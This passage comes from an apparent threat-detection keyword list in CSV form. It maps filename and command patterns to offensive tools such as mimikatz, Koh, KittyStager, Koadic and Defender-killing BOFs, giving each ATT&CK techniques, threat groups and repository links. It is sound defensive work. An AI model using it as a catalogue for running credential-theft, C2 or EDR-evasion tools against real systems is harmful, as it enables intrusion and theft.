APT29,C2,https://github.com/Octoberfest7/KillDefender_BOF,1,1,N/A,10,10,50,16,2022-06-28T15:54:15Z,2022-02-11T07:03:59Z -*killdefender_bof*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*KillDefenderBOF-main*,offensive_tool_keyword,KillDefenderBOF,KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender,T1055.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Cerbersec/KillDefenderBOF,1,1,N/A,10,3,200,29,2022-04-12T17:45:50Z,2022-02-06T21:59:03Z -*Killed running eventvwr*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-EventVwrBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Killed running sdclt*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-SDCLTBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*kill-implant*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*killprocess.py*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*kimi_MDPC/kimi.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*kindloader.exe* --extract kindlocker*,greyware_tool_keyword,tir_blanc_holiseum,Ransomware simulation,T1486 - T1204 - T1027 - T1059,TA0040 - TA0002 - TA0005,N/A,N/A,Ransomware,https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware,1,0,N/A,4,6,N/A,N/A,N/A,N/A -*kintercept.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*kintercept.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*kirbi_to_hashcat.py*,offensive_tool_keyword,Timeroast,Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID,T1558.003 - T1059.003 - T1078.004,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/SecuraBV/Timeroast,1,1,N/A,10,2,152,16,2023-07-04T07:12:57Z,2023-01-18T09:04:05Z -*kirbi2john.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*kirbi2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*kirbi2john.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*kirbikator.exe*,offensive_tool_keyword,kekeo,access the LSA (Local Security Authority) and manipulate Kerberos tickets. potentially allowing adversaries to gain unauthorized access to Active Directory resources and CIFS file shares,T1003,TA0006,N/A,N/A,Credential Access,https://github.com/gentilkiwi/kekeo,1,1,N/A,N/A,10,1277,216,2021-12-14T10:56:48Z,2015-01-13T21:24:09Z -*kite03/echoac-poc*,offensive_tool_keyword,echoac-poc,poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/kite03/echoac-poc,1,1,N/A,8,2,118,25,2023-08-03T04:09:38Z,2023-06-28T00:52:22Z -*kitrap0d.x86.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*kitrap0d_payload*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*kitten.dll*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*kitten/basicKitten*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*kitten_test.go*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*kittens/bananaKitten*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*Kittielocal -*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*KittyStager -*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*KittyStager ?*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*KittyStager ??*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*KittyStager.git*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*KittyStager/cmd*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*KittyStager/internal*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*KittyStager/kitten*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*Kiwi Legit Printer*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*klezVirus/CheeseTools*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*klezVirus/inceptor*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*klezVirus/SilentMoonwalk*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*klnkiajpmpkkkgpgbogmcgfjhdoljacg*,greyware_tool_keyword,Free VPN for Chrome,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*klsecservices*,offensive_tool_keyword,Github Username,exploitation tools for attackers,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/klsecservices,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*klsecservices/rpivot*,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,1,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*knajdeaocbpmfghhmijicidfcmdgbdpm*,greyware_tool_keyword,Guru VPN & Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*knmmpciebaoojcpjjoeonlcjacjopcpf*,greyware_tool_keyword,Thunder Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*known_hosts2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Koadic.persist*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*koadic_load.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*koadic_net.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*koadic_process.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*koadic_types.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*koadic_util.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*koh filter add SID*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh filter list*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh filter remove SID*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 